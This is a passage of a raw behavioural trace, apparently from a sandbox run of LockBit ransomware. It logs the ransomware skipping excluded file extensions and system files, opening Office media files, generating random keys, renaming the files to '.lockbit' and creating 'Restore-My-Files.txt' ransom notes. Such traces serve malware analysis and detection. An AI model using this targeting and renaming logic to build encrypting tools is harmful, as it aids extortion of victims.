[0199.982] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.982] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18205_.WMF") returned 1 [0199.983] lstrcmpiW (lpString1="ntldr", lpString2="BD18205_.WMF") returned 1 [0199.983] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18205_.WMF") returned 1 [0199.983] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18205_.WMF") returned 1 [0199.983] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18205_.WMF") returned -1 [0199.983] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18205_.WMF") returned 1 [0199.983] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18205_.WMF") returned 1 [0199.983] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.983] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF") returned=".WMF" [0199.983] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.983] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.983] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.984] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.984] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.984] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.984] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.984] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF.lockbit") returned 79 [0199.984] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18205_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0199.987] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.987] malloc (_Size=0x40068) returned 0x3f70048 [0199.987] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=2266) returned 1 [0199.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0199.988] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.988] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0199.988] ReadFile (in: hFile=0x308, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0199.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.990] malloc (_Size=0xb4) returned 0x1fa2ed8 [0199.991] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0199.992] free (_Block=0x1fa2ed8) [0199.992] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18205_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0199.992] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0199.992] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.992] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dd5a600, ftCreationTime.dwHighDateTime=0x1bddc9f, ftLastAccessTime.dwLowDateTime=0xbcbd9a60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4dd5a600, ftLastWriteTime.dwHighDateTime=0x1bddc9f, nFileSizeHigh=0x0, nFileSizeLow=0x8da, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18206_.WMF", cAlternateFileName="")) returned 1 [0199.992] lstrcmpiW (lpString1=".", lpString2="BD18206_.WMF") returned -1 [0199.992] lstrcmpiW (lpString1="..", lpString2="BD18206_.WMF") returned -1 [0199.992] PathFindExtensionW (pszPath="BD18206_.WMF") returned=".WMF" [0199.992] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.992] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.993] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.993] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18206_.WMF") returned 1 [0199.994] lstrcmpiW (lpString1="ntldr", lpString2="BD18206_.WMF") returned 1 [0199.994] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18206_.WMF") returned 1 [0199.994] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18206_.WMF") returned 1 [0199.994] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18206_.WMF") returned -1 [0199.994] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18206_.WMF") returned 1 [0199.994] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18206_.WMF") returned 1 [0199.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0199.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF") returned=".WMF" [0199.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.994] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.994] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.995] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.995] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF.lockbit") returned 79 [0199.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18206_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0199.996] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.996] malloc (_Size=0x40068) returned 0x3df0008 [0199.996] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2266) returned 1 [0199.996] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.997] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0200.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.004] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.004] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.005] free (_Block=0x1fa2ed8) [0200.005] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18206_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.005] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.005] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.005] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5e8e00, ftCreationTime.dwHighDateTime=0x1bdcf20, ftLastAccessTime.dwLowDateTime=0xbcbd9a60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf5e8e00, ftLastWriteTime.dwHighDateTime=0x1bdcf20, nFileSizeHigh=0x0, nFileSizeLow=0xfbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18207_.WMF", cAlternateFileName="")) returned 1 [0200.005] lstrcmpiW (lpString1=".", lpString2="BD18207_.WMF") returned -1 [0200.005] lstrcmpiW (lpString1="..", lpString2="BD18207_.WMF") returned -1 [0200.005] PathFindExtensionW (pszPath="BD18207_.WMF") returned=".WMF" [0200.005] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.005] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.005] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.005] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.005] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.005] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.005] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.006] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.006] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18207_.WMF") returned 1 [0200.007] lstrcmpiW (lpString1="ntldr", lpString2="BD18207_.WMF") returned 1 [0200.007] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18207_.WMF") returned 1 [0200.007] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18207_.WMF") returned 1 [0200.007] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18207_.WMF") returned -1 [0200.007] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18207_.WMF") returned 1 [0200.007] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18207_.WMF") returned 1 [0200.007] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.007] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF") returned=".WMF" [0200.007] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.007] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.007] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.008] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.008] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF.lockbit") returned 79 [0200.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18207_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0200.009] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.009] malloc (_Size=0x40068) returned 0x1ff1e60 [0200.009] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4028) returned 1 [0200.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0200.010] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0200.010] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0200.189] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18207_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft 